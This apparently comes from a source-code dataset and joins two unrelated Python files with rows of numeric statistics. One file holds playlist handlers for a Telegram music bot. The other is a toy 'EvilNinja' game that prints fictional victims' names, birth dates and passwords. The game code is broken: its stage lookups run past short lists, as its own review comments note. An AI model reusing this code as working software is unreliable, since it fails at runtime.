    chat_id = CallbackQuery.message.chat.id
    callback_request = callback_data.split(None, 1)[1]
    userid = CallbackQuery.from_user.id
    try:
        user_id,smex = callback_request.split("|")
    except Exception as e:
        await CallbackQuery.answer()
        return await CallbackQuery.message.edit(f"Error Occured\n**Possible reason could be**:{e}")
    Name = CallbackQuery.from_user.first_name
    chat_title = CallbackQuery.message.chat.title
    if str(smex) == "personal":
        # Personal playlists may only be started by their owner.
        if CallbackQuery.from_user.id != int(user_id):
            return await CallbackQuery.answer("This is not for you! Play your own playlist", show_alert=True)
        _playlist = await get_note_names(CallbackQuery.from_user.id)
        if not _playlist:
            return await CallbackQuery.answer(f"You have no playlist on servers.", show_alert=True)
        else:
            await CallbackQuery.message.delete()
        logger_text=f"""Starting Playlist
Group :- {chat_title}
By :- {Name}
Personal Playlist Playing."""
        await ASS_ACC.send_message(LOG_GROUP_ID, f"{logger_text}", disable_web_page_preview=True)
        mystic = await CallbackQuery.message.reply_text(f"Starting {Name}'s Personal Playlist.\n\nRequested By:- {CallbackQuery.from_user.first_name}")
        checking = f"[{CallbackQuery.from_user.first_name}](tg://user?id={userid})"
        msg = f"Queued Playlist:\n\n"
        j = 0
        for note in _playlist:
            _note = await get_playlist(CallbackQuery.from_user.id, note)
            title = _note["title"]
            videoid = _note["videoid"]
            url = (f"https://www.youtube.com/watch?v={videoid}")
            duration = _note["duration"]
            if await is_active_chat(chat_id):
                # Stream already running: just queue this entry.
                position = await put(chat_id, file=videoid)
                j += 1
                msg += f"{j}- {title[:50]}\n"
                msg += f" Queued Position- {position}\n\n"
                # Persist the requester id so later handlers can credit them.
                f20 = open(f'search/{videoid}id.txt', 'w')
                f20.write(f"{user_id}")
                f20.close()
            else:
                # No active stream yet: download this entry and start playing.
                try:
                    with youtube_dl.YoutubeDL(ytdl_opts) as ytdl:
                        x = ytdl.extract_info(url, download=False)
                except Exception as e:
                    return await mystic.edit(f"Failed to download this video.\n\n**Reason**:{e}")
                title = (x["title"])
                thumbnail = (x["thumbnail"])
                def my_hook(d):
                    # youtube_dl progress hook: edits the status message at a
                    # few milestones, throttled through the module-level
                    # `flex` dict (keyed by the download's total byte count).
                    if d['status'] == 'downloading':
                        percentage = d['_percent_str']
                        per = (str(percentage)).replace(".","", 1).replace("%","", 1)
                        per = int(per)
                        eta = d['eta']
                        speed = d['_speed_str']
                        size = d['_total_bytes_str']
                        bytesx = d['total_bytes']
                        if str(bytesx) in flex:
                            pass
                        else:
                            flex[str(bytesx)] = 1
                        if flex[str(bytesx)] == 1:
                            flex[str(bytesx)] += 1
                            try:
                                if eta > 2:
                                    mystic.edit(f"Downloading {title[:50]}\n\n**FileSize:** {size}\n**Downloaded:** {percentage}\n**Speed:** {speed}\n**ETA:** {eta} sec")
                            except Exception as e:
                                pass
                        if per > 250:
                            if flex[str(bytesx)] == 2:
                                flex[str(bytesx)] += 1
                                if eta > 2:
                                    mystic.edit(f"Downloading {title[:50]}..\n\n**FileSize:** {size}\n**Downloaded:** {percentage}\n**Speed:** {speed}\n**ETA:** {eta} sec")
                                print(f"[{videoid}] Downloaded {percentage} at a speed of {speed} | ETA: {eta} seconds")
                        if per > 500:
                            if flex[str(bytesx)] == 3:
                                flex[str(bytesx)] += 1
                                if eta > 2:
                                    mystic.edit(f"Downloading {title[:50]}...\n\n**FileSize:** {size}\n**Downloaded:** {percentage}\n**Speed:** {speed}\n**ETA:** {eta} sec")
                                print(f"[{videoid}] Downloaded {percentage} at a speed of {speed} | ETA: {eta} seconds")
                        if per > 800:
                            if flex[str(bytesx)] == 4:
                                flex[str(bytesx)] += 1
                                if eta > 2:
                                    mystic.edit(f"Downloading {title[:50]}....\n\n**FileSize:** {size}\n**Downloaded:** {percentage}\n**Speed:** {speed}\n**ETA:** {eta} sec")
                                print(f"[{videoid}] Downloaded {percentage} at a speed of {speed} | ETA: {eta} seconds")
                    if d['status'] == 'finished':
                        try:
                            taken = d['_elapsed_str']
                        except Exception as e:
                            taken = "00:00"
                        size = d['_total_bytes_str']
                        mystic.edit(f"**Downloaded {title[:50]}.....**\n\n**FileSize:** {size}\n**Time Taken:** {taken} sec\n\n**Converting File**[__FFmpeg processing__]")
                        print(f"[{videoid}] Downloaded| Elapsed: {taken} seconds")
                # Blocking download runs in the default executor.
                loop = asyncio.get_event_loop()
                xx = await loop.run_in_executor(None, download, url, my_hook)
                file = await convert(xx)
                await music_on(chat_id)
                await add_active_chat(chat_id)
                yukki.pytgcalls.join_group_call(chat_id, file)
                theme = random.choice(themes)
                ctitle = CallbackQuery.message.chat.title
                ctitle = await CHAT_TITLE(ctitle)
                thumb = await gen_thumb(thumbnail, title, userid, theme, ctitle)
                buttons = play_markup(videoid, user_id)
                m = await CallbackQuery.message.reply_photo(
                    photo=thumb,
                    reply_markup=InlineKeyboardMarkup(buttons),
                    caption=(f"🎥<b>__Playing:__ </b>[{title[:25]}]({url}) \n⏳<b>__Duration:__</b> {duration} \n💡<b>__Info:__</b> [Get Additional Information](https://t.me/{BOT_USERNAME}?start=info_{videoid})\n👤**__Requested by:__** {checking}")
                )
                os.remove(thumb)
                await CallbackQuery.message.delete()
                await mystic.delete()
        # Paste the queued-list summary to the bin and post the controls.
        m = await CallbackQuery.message.reply_text("Pasting Queued Playlist to Bin")
        link = await paste(msg)
        preview = link + "/preview.png"
        urlxp = link + "/index.txt"
        a1 = InlineKeyboardButton(text=f"Checkout Queued Playlist", url=urlxp)
        key = InlineKeyboardMarkup(
            [
                [
                    InlineKeyboardButton(text="▶️", callback_data=f'resumevc2'),
                    InlineKeyboardButton(text="⏸️", callback_data=f'pausevc2'),
                    InlineKeyboardButton(text="⏭️", callback_data=f'skipvc2'),
                    InlineKeyboardButton(text="⏹️", callback_data=f'stopvc2')
                ],
                [
                    a1,
                ],
                [
                    InlineKeyboardButton(text="🗑 Close Menu", callback_data=f'close2')
                ]
            ]
        )
        if await isPreviewUp(preview):
            try:
                await CallbackQuery.message.reply_photo(
                    photo=preview, caption=f"This is Queued Playlist of {Name}.\n\nIf you want to delete any music from playlist use : /delmyplaylist", quote=False, reply_markup=key
                )
                await m.delete()
            except Exception:
                pass
        else:
            await CallbackQuery.message.reply_text(
                text=msg, reply_markup=key
            )
            await m.delete()
    if str(smex) == "group":
        # Same flow as the personal branch, keyed on the chat id instead of
        # the user id.
        _playlist = await get_note_names(CallbackQuery.message.chat.id)
        if not _playlist:
            return await CallbackQuery.answer(f"Your Group has no playlist on servers. Try adding musics in playlist.", show_alert=True)
        else:
            await CallbackQuery.message.delete()
        logger_text=f"""Starting Playlist
Group :- {chat_title}
By :- {Name}
Group Playlist Playing."""
        await ASS_ACC.send_message(LOG_GROUP_ID, f"{logger_text}", disable_web_page_preview=True)
        mystic = await CallbackQuery.message.reply_text(f"Starting Groups's Playlist.\n\nRequested By:- {CallbackQuery.from_user.first_name}")
        checking = f"[{CallbackQuery.from_user.first_name}](tg://user?id={userid})"
        msg = f"Queued Playlist:\n\n"
        j = 0
        for note in _playlist:
            _note = await get_playlist(CallbackQuery.message.chat.id, note)
            title = _note["title"]
            videoid = _note["videoid"]
            url = (f"https://www.youtube.com/watch?v={videoid}")
            duration = _note["duration"]
            if await is_active_chat(chat_id):
                position = await put(chat_id, file=videoid)
                j += 1
                msg += f"{j}- {title[:50]}\n"
                msg += f" Queued Position- {position}\n\n"
                f20 = open(f'search/{videoid}id.txt', 'w')
                f20.write(f"{user_id}")
                f20.close()
            else:
                try:
                    with youtube_dl.YoutubeDL(ytdl_opts) as ytdl:
                        x = ytdl.extract_info(url, download=False)
                except Exception as e:
                    return await mystic.edit(f"Failed to download this video.\n\n**Reason**:{e}")
                title = (x["title"])
                thumbnail = (x["thumbnail"])
                def my_hook(d):
                    # Same throttled progress hook as the personal branch.
                    if d['status'] == 'downloading':
                        percentage = d['_percent_str']
                        per = (str(percentage)).replace(".","", 1).replace("%","", 1)
                        per = int(per)
                        eta = d['eta']
                        speed = d['_speed_str']
                        size = d['_total_bytes_str']
                        bytesx = d['total_bytes']
                        if str(bytesx) in flex:
                            pass
                        else:
                            flex[str(bytesx)] = 1
                        if flex[str(bytesx)] == 1:
                            flex[str(bytesx)] += 1
                            try:
                                if eta > 2:
                                    mystic.edit(f"Downloading {title[:50]}\n\n**FileSize:** {size}\n**Downloaded:** {percentage}\n**Speed:** {speed}\n**ETA:** {eta} sec")
                            except Exception as e:
                                pass
                        if per > 250:
                            if flex[str(bytesx)] == 2:
                                flex[str(bytesx)] += 1
                                if eta > 2:
                                    mystic.edit(f"Downloading {title[:50]}..\n\n**FileSize:** {size}\n**Downloaded:** {percentage}\n**Speed:** {speed}\n**ETA:** {eta} sec")
                                print(f"[{videoid}] Downloaded {percentage} at a speed of {speed} | ETA: {eta} seconds")
                        if per > 500:
                            if flex[str(bytesx)] == 3:
                                flex[str(bytesx)] += 1
                                if eta > 2:
                                    mystic.edit(f"Downloading {title[:50]}...\n\n**FileSize:** {size}\n**Downloaded:** {percentage}\n**Speed:** {speed}\n**ETA:** {eta} sec")
                                print(f"[{videoid}] Downloaded {percentage} at a speed of {speed} | ETA: {eta} seconds")
                        if per > 800:
                            if flex[str(bytesx)] == 4:
                                flex[str(bytesx)] += 1
                                if eta > 2:
                                    mystic.edit(f"Downloading {title[:50]}....\n\n**FileSize:** {size}\n**Downloaded:** {percentage}\n**Speed:** {speed}\n**ETA:** {eta} sec")
                                print(f"[{videoid}] Downloaded {percentage} at a speed of {speed} | ETA: {eta} seconds")
                    if d['status'] == 'finished':
                        try:
                            taken = d['_elapsed_str']
                        except Exception as e:
                            taken = "00:00"
                        size = d['_total_bytes_str']
                        mystic.edit(f"**Downloaded {title[:50]}.....**\n\n**FileSize:** {size}\n**Time Taken:** {taken} sec\n\n**Converting File**[__FFmpeg processing__]")
                        print(f"[{videoid}] Downloaded| Elapsed: {taken} seconds")
                loop = asyncio.get_event_loop()
                xx = await loop.run_in_executor(None, download, url, my_hook)
                file = await convert(xx)
                await music_on(chat_id)
                await add_active_chat(chat_id)
                yukki.pytgcalls.join_group_call(chat_id, file)
                theme = random.choice(themes)
                ctitle = CallbackQuery.message.chat.title
                ctitle = await CHAT_TITLE(ctitle)
                thumb = await gen_thumb(thumbnail, title, userid, theme, ctitle)
                buttons = play_markup(videoid, user_id)
                m = await CallbackQuery.message.reply_photo(
                    photo=thumb,
                    reply_markup=InlineKeyboardMarkup(buttons),
                    caption=(f"🎥<b>__Playing:__ </b>[{title[:25]}]({url}) \n⏳<b>__Duration:__</b> {duration} \n💡<b>__Info:__</b> [Get Additional Information](https://t.me/{BOT_USERNAME}?start=info_{videoid})\n👤**__Requested by:__** {checking}")
                )
                os.remove(thumb)
                await CallbackQuery.message.delete()
                await asyncio.sleep(1)
                await mystic.delete()
        m = await CallbackQuery.message.reply_text("Pasting Queued Playlist to Bin")
        link = await paste(msg)
        preview = link + "/preview.png"
        urlxp = link + "/index.txt"
        a1 = InlineKeyboardButton(text=f"Checkout Queued Playlist", url=urlxp)
        key = InlineKeyboardMarkup(
            [
                [
                    InlineKeyboardButton(text="▶️", callback_data=f'resumevc2'),
                    InlineKeyboardButton(text="⏸️", callback_data=f'pausevc2'),
                    InlineKeyboardButton(text="⏭️", callback_data=f'skipvc2'),
                    InlineKeyboardButton(text="⏹️", callback_data=f'stopvc2')
                ],
                [
                    a1,
                ],
                [
                    InlineKeyboardButton(text="🗑 Close Menu", callback_data=f'close2')
                ]
            ]
        )
        if await isPreviewUp(preview):
            try:
                await CallbackQuery.message.reply_photo(
                    photo=preview, caption=f"This is Queued Playlist of Your Group.\n\nIf you want to delete any music from playlist use : /delgroupplaylist", quote=False, reply_markup=key
                )
                await m.delete()
            except Exception:
                pass
        else:
            await CallbackQuery.message.reply_text(
                text=msg, reply_markup=key
            )
            await m.delete()
@Client.on_callback_query(filters.regex("group_playlist"))
async def group_playlist(_, CallbackQuery):
    """Add the video from the callback payload to the group's saved playlist.

    Callback payload is "<videoid>|<smex>".  The playlist is capped at 30
    entries.  Fixes: counting loop replaced by len() (the loop also clobbered
    `smex`); `== 30` cap check changed to `>= 30` (the original stopped
    enforcing the cap once the count passed 30); empty search results no
    longer crash with NameError.
    """
    await CallbackQuery.answer()
    member = await app.get_chat_member(CallbackQuery.message.chat.id, CallbackQuery.from_user.id)
    if not member.can_manage_voice_chats:
        return await CallbackQuery.answer("You don't have the required permission to perform this action.\nPermission: MANAGE VOICE CHATS", show_alert=True)
    callback_data = CallbackQuery.data.strip()
    chat_id = CallbackQuery.message.chat.id
    callback_request = callback_data.split(None, 1)[1]
    try:
        url, smex = callback_request.split("|")
    except Exception as e:
        return await CallbackQuery.message.edit(f"Error Occured\n**Possible reason could be**: {e}")
    Name = CallbackQuery.from_user.first_name
    _count = await get_note_names(chat_id)
    if not _count:
        sex = await CallbackQuery.message.reply_text("Welcome To MUNNA X MUSIC's Playlist Feature.\n\nGenerating Your Group's Playlist In Database...Please wait.")
        await asyncio.sleep(2)
        await sex.delete()
    else:
        if len(_count) >= 30:
            return await CallbackQuery.message.reply_text("Sorry! You can only have 30 music in group playlist.")
    title = None
    duration = None
    videoid = None
    try:
        url = f"https://www.youtube.com/watch?v={url}"
        results = VideosSearch(url, limit=1)
        for result in results.result()["result"]:
            title = result["title"]
            duration = result["duration"]
            videoid = result["id"]
    except Exception as e:
        return await CallbackQuery.message.reply_text(f"Some Error Occured.\nPlease forward to @menotdeveloper\n**Possible Reason:** {e}")
    if videoid is None:
        # Previously an empty result set left `videoid` unbound and the
        # handler crashed with NameError outside the try block.
        return await CallbackQuery.message.reply_text("Some Error Occured.\nPlease forward to @menotdeveloper\n**Possible Reason:** No results found")
    _check = await get_playlist(chat_id, videoid)
    title = title[:50]
    if _check:
        return await CallbackQuery.message.reply_text(f"{Name}, Its already in the Playlist!")
    assis = {
        "videoid": videoid,
        "title": title,
        "duration": duration,
    }
    await save_playlist(chat_id, videoid, assis)
    return await CallbackQuery.message.reply_text(f"Added to Group's Playlist by {Name}")
@Client.on_callback_query(filters.regex("playlist"))
async def pla_playylistt(_, CallbackQuery):
    """Add the video from the callback payload to the user's personal playlist.

    Capped at 30 entries unless the user is in SUDOERS.  Fixes: counting loop
    replaced by len(); `== 30` cap check changed to `>= 30` (the original
    stopped enforcing the cap past 30); empty search results no longer crash
    with NameError.
    """
    await CallbackQuery.answer()
    callback_data = CallbackQuery.data.strip()
    callback_request = callback_data.split(None, 1)[1]
    userid = CallbackQuery.from_user.id
    try:
        url, smex = callback_request.split("|")
    except Exception as e:
        return await CallbackQuery.message.edit(f"Error Occured\n**Possible reason could be**:{e}")
    Name = CallbackQuery.from_user.first_name
    _count = await get_note_names(userid)
    if not _count:
        sex = await CallbackQuery.message.reply_text("Welcome To MUNNA X MUSIC's Playlist Feature.\n\nGenerating Your Playlist In Database...Please wait.")
        await asyncio.sleep(2)
        await sex.delete()
    else:
        # SUDOERS bypass the 30-entry cap, as in the original.
        if len(_count) >= 30 and userid not in SUDOERS:
            return await CallbackQuery.message.reply_text("Sorry! You can only have 30 music in your playlist.")
    title = None
    duration = None
    videoid = None
    try:
        url = f"https://www.youtube.com/watch?v={url}"
        results = VideosSearch(url, limit=1)
        for result in results.result()["result"]:
            title = result["title"]
            duration = result["duration"]
            videoid = result["id"]
    except Exception as e:
        return await CallbackQuery.message.reply_text(f"Some Error Occured.\nPlease forward to @menotdeveloper\n**Possible Reason:**{e}")
    if videoid is None:
        # Previously an empty result set left `videoid` unbound and the
        # handler crashed with NameError outside the try block.
        return await CallbackQuery.message.reply_text("Some Error Occured.\nPlease forward to @menotdeveloper\n**Possible Reason:** No results found")
    _check = await get_playlist(userid, videoid)
    if _check:
        return await CallbackQuery.message.reply_text(f"{Name}, Its already in the Playlist!")
    title = title[:50]
    assis = {
        "videoid": videoid,
        "title": title,
        "duration": duration,
    }
    await save_playlist(userid, videoid, assis)
    return await CallbackQuery.message.reply_text(f"Added to {Name}'s Playlist")
@Client.on_callback_query(filters.regex("P_list"))
async def P_list(_, CallbackQuery):
    """Show the user's personal playlist: paste it to the bin and reply with
    the preview image, or with the plain text if no preview is served.

    Fixes: removed a duplicated CallbackQuery.answer() call and leftover
    debug print()s; the no-preview fallback used reply_photo with the paste
    URL (not an image, so it always failed) — it now sends the playlist text
    like the sibling handlers do.
    """
    _playlist = await get_note_names(CallbackQuery.from_user.id)
    if not _playlist:
        return await CallbackQuery.answer(f"You have no Personal Playlist on servers. Try adding musics in playlist.", show_alert=True)
    await CallbackQuery.answer()
    msg = f"Personal Playlist:\n\n"
    for j, note in enumerate(_playlist, start=1):
        _note = await get_playlist(CallbackQuery.from_user.id, note)
        title = _note["title"]
        duration = _note["duration"]
        msg += f"{j}- {title[:60]}\n"
        msg += f" Duration- {duration} Min(s)\n\n"
    await CallbackQuery.message.delete()
    m = await CallbackQuery.message.reply_text("Pasting Playlist to Bin")
    link = await paste(msg)
    preview = link + "/preview.png"
    urlxp = link + "/index.txt"
    user_id = CallbackQuery.from_user.id
    user_name = CallbackQuery.from_user.first_name
    a2 = InlineKeyboardButton(text=f"Play {user_name[:17]}'s Playlist", callback_data=f'play_playlist {user_id}|personal')
    a3 = InlineKeyboardButton(text=f"🔗 Check Playlist", url=urlxp)
    key = InlineKeyboardMarkup(
        [
            [
                a2,
            ],
            [
                a3,
                InlineKeyboardButton(text="🗑 Close Menu", callback_data=f'close2')
            ]
        ]
    )
    if await isPreviewUp(preview):
        try:
            await CallbackQuery.message.reply_photo(
                photo=preview, quote=False, reply_markup=key
            )
            await m.delete()
        except Exception:
            pass
    else:
        await CallbackQuery.message.reply_text(
            text=msg, reply_markup=key
        )
        await m.delete()
@Client.on_callback_query(filters.regex("G_list"))
async def G_list(_, CallbackQuery):
    """Show the group's playlist: paste it to the bin and reply with the
    preview image, or with the plain text if no preview is served.

    Fixes: the no-preview fallback used reply_photo with the paste URL (not
    an image, so it always failed) — it now sends the playlist text; also
    removed the unused `user_name` local.
    """
    _playlist = await get_note_names(CallbackQuery.message.chat.id)
    if not _playlist:
        return await CallbackQuery.answer(f"You have no Group Playlist on servers. Try adding musics in playlist.", show_alert=True)
    await CallbackQuery.answer()
    msg = f"Group Playlist:\n\n"
    for j, note in enumerate(_playlist, start=1):
        _note = await get_playlist(CallbackQuery.message.chat.id, note)
        title = _note["title"]
        duration = _note["duration"]
        msg += f"{j}- {title[:60]}\n"
        msg += f" Duration- {duration} Min(s)\n\n"
    await CallbackQuery.message.delete()
    m = await CallbackQuery.message.reply_text("Pasting Playlist to Bin")
    link = await paste(msg)
    preview = link + "/preview.png"
    urlxp = link + "/index.txt"
    user_id = CallbackQuery.from_user.id
    a1 = InlineKeyboardButton(text=f"Play Group's Playlist", callback_data=f'play_playlist {user_id}|group')
    a3 = InlineKeyboardButton(text=f"🔗 Check Playlist", url=urlxp)
    key = InlineKeyboardMarkup(
        [
            [
                a1,
            ],
            [
                a3,
                InlineKeyboardButton(text="🗑 Close Menu", callback_data=f'close2')
            ]
        ]
    )
    if await isPreviewUp(preview):
        try:
            await CallbackQuery.message.reply_photo(
                photo=preview, quote=False, reply_markup=key
            )
            await m.delete()
        except Exception:
            pass
    else:
        await CallbackQuery.message.reply_text(
            text=msg, reply_markup=key
        )
        await m.delete()
@Client.on_callback_query(filters.regex("cbgroupdel"))
async def cbgroupdel(_, CallbackQuery):
    """Delete every entry of the group's saved playlist (button handler).

    Requires the "manage voice chats" right.  Cleanup: removed the unused
    `titlex` accumulator.
    """
    member = await app.get_chat_member(CallbackQuery.message.chat.id, CallbackQuery.from_user.id)
    if not member.can_manage_voice_chats:
        return await CallbackQuery.answer("You don't have the required permission to perform this action.\nPermission: MANAGE VOICE CHATS", show_alert=True)
    await CallbackQuery.message.delete()
    await CallbackQuery.answer()
    _playlist = await get_note_names(CallbackQuery.message.chat.id)
    if not _playlist:
        return await CallbackQuery.message.reply_text("Group has no Playlist on MUNNA X MUSIC's Server")
    for note in _playlist:
        await delete_playlist(CallbackQuery.message.chat.id, note)
    await CallbackQuery.message.reply_text("Successfully deleted your Group's whole playlist")
@Client.on_callback_query(filters.regex("cbdel"))
async def delplcb(_, CallbackQuery):
    """Delete every entry of the user's personal playlist (button handler).

    Cleanup: removed the unused `titlex` accumulator.
    """
    await CallbackQuery.answer()
    await CallbackQuery.message.delete()
    _playlist = await get_note_names(CallbackQuery.from_user.id)
    if not _playlist:
        return await CallbackQuery.message.reply_text("You have no Playlist on MUNNA X MUSIC's Server")
    for note in _playlist:
        await delete_playlist(CallbackQuery.from_user.id, note)
    await CallbackQuery.message.reply_text("Successfully deleted your whole playlist")
| 50.692308
| 244
| 0.559519
| 4,710
| 42,835
| 4.942038
| 0.092994
| 0.073033
| 0.055849
| 0.047687
| 0.840357
| 0.826653
| 0.793315
| 0.774842
| 0.760665
| 0.72853
| 0
| 0.008427
| 0.329567
| 42,835
| 845
| 245
| 50.692308
| 0.800752
| 0
| 0
| 0.724224
| 0
| 0.039752
| 0.199762
| 0.044262
| 0
| 0
| 0
| 0
| 0
| 1
| 0.003727
| false
| 0.014907
| 0.067081
| 0
| 0.115528
| 0.017391
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
72ad14e6b6354b234e34163e68c1cabbac949a35
| 35,186
|
py
|
Python
|
Plugins/Games/EvilNinja/Functions.py
|
CHHOrganization/BlackDoc
|
7931f7d659344b44b6bdedfc0f1157910366bf64
|
[
"Unlicense"
] | 3
|
2022-03-17T23:19:52.000Z
|
2022-03-18T10:36:52.000Z
|
Plugins/Games/EvilNinja/Functions.py
|
CHHOrganization/BlackDoc
|
7931f7d659344b44b6bdedfc0f1157910366bf64
|
[
"Unlicense"
] | 1
|
2022-03-18T04:51:44.000Z
|
2022-03-21T02:16:13.000Z
|
Plugins/Games/EvilNinja/Functions.py
|
CHHOrganization/BlackDoc
|
7931f7d659344b44b6bdedfc0f1157910366bf64
|
[
"Unlicense"
] | null | null | null |
import os,sys,time
from Settings import *
#EVilNinja Data
# Victim identities and passwords, indexed in parallel: entry i of the
# Names/Surnames/DOBs lists describes one victim, and entry i of the
# matching *_Passwords list is the password derived from that identity.
# NOTE(review): the stage-printer functions below index these lists up to
# [34], but the lists hold only 4-6 entries, so later stages raise
# IndexError when called — the data appears unfinished; confirm.
Level_1_Names = ["Kerry", "Jackey", "Mary", "Blackey", "Melisa", "Susan"]
Level_1_Surnames = ["White", "Rockafeller", "Chinano", "Kingsley", "Martinez", "White"]
Level_1_DOBs = ["1980-12-26", "1966-03-09", "1972-06-23", "1994-08-08", "1982-11-10", "1961-06-16" ]
EL_Passwords = ["26White12", "6603Jackey", "197206Mary", "Kingsley08", "1982Martinez", "Susan1961"]
# NOTE(review): Level_2_Names and Level_3_Names carry a trailing "" (5
# entries vs 4 surnames/DOBs) — looks like an editing leftover; confirm.
Level_2_Names = ["Kerry", "Jackey", "Mary", "Blackey", ""]
Level_2_Surnames = ["White", "Rockafeller", "Chinano", "Kingsley"]
Level_2_DOBs = ["1980-12-26", "1966-03-09", "1972-06-23", "1994-08-08" ]
NL_Passwords = ["26White12", "6603Jackey", "197206Mary", "Kingsley08"]
# NOTE(review): the Level_3_* / HL_Passwords data is never referenced by
# the hard-level printers below (they reuse Level_1/Level_2) — confirm.
Level_3_Names = ["Kerry", "Jackey", "Mary", "Blackey", ""]
Level_3_Surnames = ["White", "Rockafeller", "Chinano", "Kingsley"]
Level_3_DOBs = ["1980-12-26", "1966-03-09", "1972-06-23", "1994-08-08" ]
HL_Passwords = ["26White12", "6603Jackey", "197206Mary", "Kingsley08"]
#Victims data dashborad hader
def Victims_DDB():
    """Type out the victims-details dashboard banner one character at a
    time (0.3 s per character), then reset the terminal colors."""
    banner = "-------Here Is The Victims Details-------"
    print(BG_Bright_Cyan + Bright_Yellow)
    out = sys.stdout
    for ch in banner:
        out.write(ch)
        out.flush()
        time.sleep(0.3)
    print(Rest +"")
#Victims data for Easy Levels
# The 35 easy-level stage printers (Victims_Data_ELS1..Victims_Data_ELS35)
# were originally 35 copy/pasted function definitions; they are generated
# in a loop here instead.  Generated behavior matches the originals,
# including the latent defect that the Level_1_* lists hold only 6
# entries, so Victims_Data_ELS7 and above raise IndexError when called.
# NOTE(review): a missing Ms<n> banner in Settings now surfaces as
# KeyError (globals() lookup) where the originals raised NameError —
# confirm Ms1..Ms35 all exist in Settings.
def _make_easy_stage_printer(idx):
    """Return a no-argument printer for easy-level stage ``idx + 1``."""
    def _printer():
        # Ms<n> stage banners come from Settings via star-import; resolve
        # lazily at call time, as the original direct references did.
        print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + globals()["Ms" + str(idx + 1)] + Bright_Red + " [Password Has 9 Char...] " + Rest)
        print(Bright_Green + "Name: " + Level_1_Names[idx])
        print("Surname: " + Level_1_Surnames[idx])
        print("Date of Birth: " + Level_1_DOBs[idx])
    return _printer

for _stage_idx in range(35):
    globals()["Victims_Data_ELS" + str(_stage_idx + 1)] = _make_easy_stage_printer(_stage_idx)
del _stage_idx
#Victims data for Normal Levels
# Generated replacements for the 35 copy/pasted normal-level printers
# (Victims_Data_NLS1..Victims_Data_NLS35).  Original quirks preserved:
# stages 1-4 take the name from Level_2_Names while stages 5+ fall back
# to Level_1_Names, and surname/DOB always come from the Level_2_* lists
# — which hold only 4 entries, so Victims_Data_NLS5 and above raise
# IndexError when called, exactly as the originals did.
def _make_normal_stage_printer(idx):
    """Return a no-argument printer for normal-level stage ``idx + 1``."""
    def _printer():
        # Ms<n> stage banners come from Settings via star-import; resolve
        # lazily at call time, as the original direct references did.
        print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + globals()["Ms" + str(idx + 1)] + Bright_Red + " [Password Has 9 Char...] " + Rest)
        # Originals used Level_2_Names for stages 1-4, Level_1_Names after.
        print(Bright_Green + "Name: " + (Level_2_Names[idx] if idx < 4 else Level_1_Names[idx]))
        print("Surname: " + Level_2_Surnames[idx])
        print("Date of Birth: " + Level_2_DOBs[idx])
    return _printer

for _stage_idx in range(35):
    globals()["Victims_Data_NLS" + str(_stage_idx + 1)] = _make_normal_stage_printer(_stage_idx)
del _stage_idx
#Victims data for Hard Levels
# Generated replacements for the 35 copy/pasted hard-level printers
# (Victims_Data_HLS1..Victims_Data_HLS35).  The originals were a verbatim
# copy of the normal-level printers: they use the Level_1/Level_2 lists,
# never the Level_3_* data or HL_Passwords.
# NOTE(review): the hard level was presumably meant to use Level_3_* —
# confirm; behavior here is kept identical to the originals, including
# IndexError for Victims_Data_HLS5 and above (Level_2_* hold 4 entries).
def _make_hard_stage_printer(idx):
    """Return a no-argument printer for hard-level stage ``idx + 1``."""
    def _printer():
        # Ms<n> stage banners come from Settings via star-import; resolve
        # lazily at call time, as the original direct references did.
        print(BG_Bright_Blue + Bright_Red + "[+] ->" + Bright_Yellow + " Stage " + globals()["Ms" + str(idx + 1)] + Bright_Red + " [Password Has 9 Char...] " + Rest)
        # Originals used Level_2_Names for stages 1-4, Level_1_Names after.
        print(Bright_Green + "Name: " + (Level_2_Names[idx] if idx < 4 else Level_1_Names[idx]))
        print("Surname: " + Level_2_Surnames[idx])
        print("Date of Birth: " + Level_2_DOBs[idx])
    return _printer

for _stage_idx in range(35):
    globals()["Victims_Data_HLS" + str(_stage_idx + 1)] = _make_hard_stage_printer(_stage_idx)
del _stage_idx
#Stage 1 In Easy Level
def ELStage1():
    """Play stage 1 of the easy level.

    Prompts the player for a password and, when it matches
    ``EL_Passwords[0]``, prints an animated congratulations banner
    (typewriter effect: one character every 0.1 s) followed by a
    confirmation line.

    NOTE(review): a wrong guess falls through silently here; the
    retry/game-over handling appears to live elsewhere (cf.
    ``Try_Again``) -- confirm against the caller.
    """
    guess = input(Bright_Cyan + "Password: ")
    if guess == EL_Passwords[0]:
        print(BG_Dark_Magenta + Bright_Yellow)
        # Fixed user-facing typo: original said "Congradulations".
        win_msg = " Congratulations \nYou Won "
        for char in win_msg:
            sys.stdout.write(char)
            sys.stdout.flush()
            time.sleep(0.1)
        print(Rest)
        print(BG_Dark_Blue + " " + Bright_Green + guess + " Is Correct! " + Rest)
        print("\n")
#Trying Again Config
def Try_Again():
    """Record one failed attempt and end the game after three misses.

    Increments the module-level ``Trying_Again`` counter and, once it
    reaches 3, prints an animated "Game Over" message (one character
    every 0.1 s).

    Fixes over the original body:
    - ``Trying_Again += 1`` lacked a ``global`` declaration, so it
      raised UnboundLocalError on the first call.
    - The loop ended with ``break`` outside any enclosing loop, which
      is a SyntaxError; the function now simply returns after the
      message finishes.
    """
    global Trying_Again
    print(Bright_Red + "You Running out of lucks.")
    Trying_Again += 1
    if Trying_Again == 3:
        game_over_msg = "GameOver\nTry Better Next Time."
        print(BG_Bright_Cyan + Bright_Red + "")
        for char in game_over_msg:
            sys.stdout.write(char)
            sys.stdout.flush()
            time.sleep(0.1)
| 50.627338
| 135
| 0.625988
| 4,803
| 35,186
| 4.270664
| 0.05788
| 0.093019
| 0.067814
| 0.087022
| 0.941303
| 0.89611
| 0.888699
| 0.827759
| 0.827759
| 0.827759
| 0
| 0.054119
| 0.202296
| 35,186
| 695
| 136
| 50.627338
| 0.676678
| 0.004775
| 0
| 0.617801
| 0
| 0
| 0.230754
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.188482
| false
| 0.191972
| 0.00349
| 0
| 0.191972
| 0.746946
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
